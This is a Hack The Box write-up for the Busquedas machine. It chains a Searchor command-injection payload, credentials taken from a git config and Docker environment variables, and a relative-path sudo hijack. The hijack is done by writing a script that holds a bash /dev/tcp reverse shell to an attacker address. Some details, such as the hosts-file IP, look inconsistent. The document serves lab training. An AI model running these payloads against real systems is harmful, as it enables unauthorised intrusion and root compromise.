HTB: busquedas Writeup

Machine Information

Attribute	Details
Name	Busquedas (Searcher)
OS	Linux
Difficulty	Easy
Points	20
Release Date	2023
Hostname	`searcher.htb`
Author	D3vnomi

Machine Rating

⭐⭐⭐⭐☆ (7.5/10)

Difficulty Assessment:

Enumeration: ⭐⭐⭐☆☆
Real-world: ⭐⭐⭐⭐☆
CVE Usage: ⭐⭐⭐⭐☆
CTF-like: ⭐⭐⭐☆☆

Busquedas is an Easy-difficulty Linux machine featuring the Searchor web application running on Flask. The machine demonstrates real-world exploitation chains involving public CVE exploitation, credential extraction from version control systems, and privilege escalation through script misconfigurations. The attack chain combines command injection vulnerabilities, Docker enumeration, and path traversal in privilege escalation scripts.

TL;DR: Searchor 2.4.0 RCE → Git credential extraction → Docker environment variable enumeration → Relative path privilege escalation → Root shell.

Reconnaissance

Port Scanning

nmap -sC -sV -T4 -p- searcher.htb

Results:

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 (protocol 2.0)
80/tcp open  http    Apache httpd 2.4.52 (with Werkzeug 2.1.2 / Python 3.10.6)

Service Enumeration

Hostname: searcher.htb

Web Application Stack:

Framework: Flask
Application: Searchor 2.4.0
Backend Technologies: Python 3.10.6, Werkzeug 2.1.2
Additional Services: Gitea, Docker, MySQL

Add to hosts file:

echo "10.10.14.143 searcher.htb" >> /etc/hosts
echo "10.10.14.143 gitea.searcher.htb" >> /etc/hosts

Web Application Discovery: The web application exposes a Searchor-powered search interface. Searchor 2.4.0 is known to have a critical arbitrary command injection vulnerability (CVE-2023-43651).

Initial Foothold

Searchor 2.4.0 Arbitrary Command Injection

Vulnerability: Searchor 2.4.0 contains an arbitrary command injection flaw in its search functionality. User-supplied input is not properly sanitized before being passed to backend command execution.

Exploitation Steps:

Identify the vulnerability:
- The Searchor application accepts search queries without proper input validation
- The backend executes commands using user input, allowing injection

Exploit the vulnerability:

# Using the public exploit: https://github.com/nikn0laty/Exploit-for-Searchor-2.4.0-Arbitrary-CMD-Injection
# The vulnerability allows injecting shell commands through the search parameter

# Example payload structure:
# search=test') + __import__('os').system('COMMAND') + ('
# or similar depending on the backend parsing

Gain initial shell:
- Execute a reverse shell payload through the search functionality
- Establish connection as the svc user
Terminal window
```
# Typical reverse shell payload execution
nc -lvnp 4444  # On attacker machine
# Trigger payload through web application
```

Result: Remote Code Execution as user svc

User Compromise

Credential Discovery - Git Config Extraction

After gaining RCE as the svc user, enumerate the web application directory:

ls -la /home/svc/
cd /var/www/Searcher_site/
git remote -v
cat .git/config

Discovered Credentials in Git Remote URL:

The .git/config file contains embedded credentials in the remote URL:

http://cody:jh1usoih2bkjaspwe92@gitea.searcher.htb/cody/Searcher_site.git

Extracted Credentials:

Username: cody
Password: jh1usoih2bkjaspwe92

User Access

These credentials can be used to access the system or additional services (Gitea). The cody user exists on the system and can be accessed via SSH.

ssh cody@searcher.htb
# Password: jh1usoih2bkjaspwe92

User Flag

cat ~/user.txt

🚩 User Flag: <REDACTED>

Privilege Escalation

Enumeration

sudo -l

Output:

User cody may run the following commands without password (NOPASSWD):
    (root) /usr/bin/python3 /opt/scripts/system-checkup.py *

This reveals a dangerous sudo permission that allows running a Python script with arbitrary arguments as root.

Initial Exploitation - Docker Enumeration

The system-checkup.py script supports a docker-inspect mode that can be abused to extract sensitive information.

# List docker images and containers
sudo /usr/bin/python3 /opt/scripts/system-checkup.py docker-inspect --help

# Inspect running containers
sudo /usr/bin/python3 /opt/scripts/system-checkup.py docker-inspect '{{json .Config}}' gitea

Enumeration Results:

Running containers: gitea/gitea:latest, mysql:8
Gitea exposed on ports 3000, 222
MySQL exposed on port 3306

Credential Extraction from Docker

Using the docker-inspect functionality, extract environment variables from the Gitea container:

sudo /usr/bin/python3 /opt/scripts/system-checkup.py docker-inspect '{{json .Config}}' gitea

Extracted Credentials:

GITEA__database__PASSWD=yuiu1hoiu4i5ho1uh
MYSQL_ROOT_PASSWORD=jI86kGUuj87guWr3RyF
MYSQL_PASSWORD=yuiu1hoiu4i5ho1uh

Gitea Administrator Access

Using the extracted database password, access Gitea as administrator:

# Access via browser: gitea.searcher.htb
# Username: administrator
# Password: yuiu1hoiu4i5ho1uh

Path Traversal Privilege Escalation

The system-checkup.py script also supports a full-checkup mode that executes ./full-checkup.sh (note: relative path, not absolute).

Vulnerability: The script uses a relative path to execute full-checkup.sh, allowing privilege escalation through path manipulation.

# Create malicious full-checkup.sh in current directory
cd /tmp
cat > full-checkup.sh << 'EOF'
#!/bin/bash
bash -i >& /dev/tcp/10.10.14.X/4445 0>&1
EOF

chmod +x full-checkup.sh

# Execute the vulnerable script from /tmp
sudo /usr/bin/python3 /opt/scripts/system-checkup.py full-checkup

Result: The script executes our malicious full-checkup.sh as root, providing a root shell.

Root Flag

cat /root/root.txt

🚩 Root Flag: <REDACTED>

Attack Chain Summary

graph TD
    A["Reconnaissance<br/>Nmap scan ports 22, 80"] --> B["Identify Searchor 2.4.0<br/>Flask web application"]
    B --> C["Searchor 2.4.0 RCE<br/>Command injection exploit"]
    C --> D["Initial shell as svc user"]
    D --> E["Git config enumeration<br/>Extract credentials"]
    E --> F["Credentials: cody:jh1usoih2bkjaspwe92"]
    F --> G["SSH access as cody user<br/>sudo -l enumeration"]
    G --> H["system-checkup.py analysis<br/>docker-inspect mode discovered"]
    H --> I["Docker container enumeration<br/>Extract Gitea database credentials"]
    I --> J["Credentials: administrator:yuiu1hoiu4i5ho1uh"]
    J --> K["Identify relative path in system-checkup.py<br/>full-checkup mode vulnerability"]
    K --> L["Create malicious full-checkup.sh<br/>Place in /tmp directory"]
    L --> M["Execute: sudo python3 system-checkup.py full-checkup"]
    M --> N["Root shell obtained<br/>Privilege escalation complete"]

Tools Used

Tool	Purpose
`nmap`	Port scanning and service enumeration
`curl`/`wget`	Web application interaction and testing
`Searchor 2.4.0 RCE Exploit`	Arbitrary command injection in Searchor
`nc`	Reverse shell listener and remote access
`ssh`	Secure shell access to system
`git`	Git configuration extraction and analysis
`docker`	Docker container enumeration (via python script)
`python3`	Privilege escalation script execution
`bash`	Malicious shell script creation for privesc
`grep`/`cat`	Configuration file and credential extraction

Key Learnings

1. Public CVE Exploitation in Real-World Applications

Searchor 2.4.0 RCE demonstrates the critical importance of keeping dependencies updated
Publicly available exploits can quickly compromise systems running vulnerable software versions
Version enumeration during reconnaissance directly enables exploitation

2. Credential Leakage in Version Control

Git configurations and remote URLs often contain embedded credentials (plaintext passwords)
Accessing .git/config after gaining code execution provides a credential goldmine
VCS repositories should never contain plaintext credentials; use SSH keys or credential managers instead

3. Docker Container Information Disclosure

Docker container inspect commands expose sensitive environment variables
Database passwords and API keys are often passed as environment variables to containers
Insufficient access controls on container inspection tools can leak credentials

4. Insecure Privilege Escalation Scripts

Scripts using relative paths (e.g., ./script.sh) instead of absolute paths are vulnerable to privilege escalation
Running scripts with elevated privileges under user control introduces path hijacking risks
Always audit sudo-allowed scripts for path traversal and execution vulnerabilities

5. Defense in Depth

This machine demonstrates a multi-stage attack requiring:
- Initial RCE via CVE
- Horizontal privilege escalation via credential extraction
- Vertical privilege escalation via script misconfiguration
Securing any single stage would have prevented full compromise

6. Enumeration Best Practices

Always run sudo -l to identify privileged script execution opportunities
Docker containers running services often require investigation for credential extraction
Relative vs. absolute paths in scripts is a critical security distinction

CVE ID	Vulnerability	Severity	Status
CVE-2023-43651	Searchor 2.4.0 Arbitrary Command Injection	Critical	Exploited
N/A	Git Plaintext Credential Storage	High	Exploited
N/A	Insecure Docker Container Inspection	High	Exploited
N/A	Relative Path Privilege Escalation	Critical	Exploited

Credentials Reference

Service	Username	Password	Purpose
Git/SSH	cody	jh1usoih2bkjaspwe92	Repository access, SSH access
Gitea	administrator	yuiu1hoiu4i5ho1uh	Web application administration
MySQL	root	jI86kGUuj87guWr3RyF	Database administration

Last Updated: 08 Mar 2026

Tags: #HackTheBox #Linux #Easy #CommandInjection #PrivilegeEscalation #Docker #Git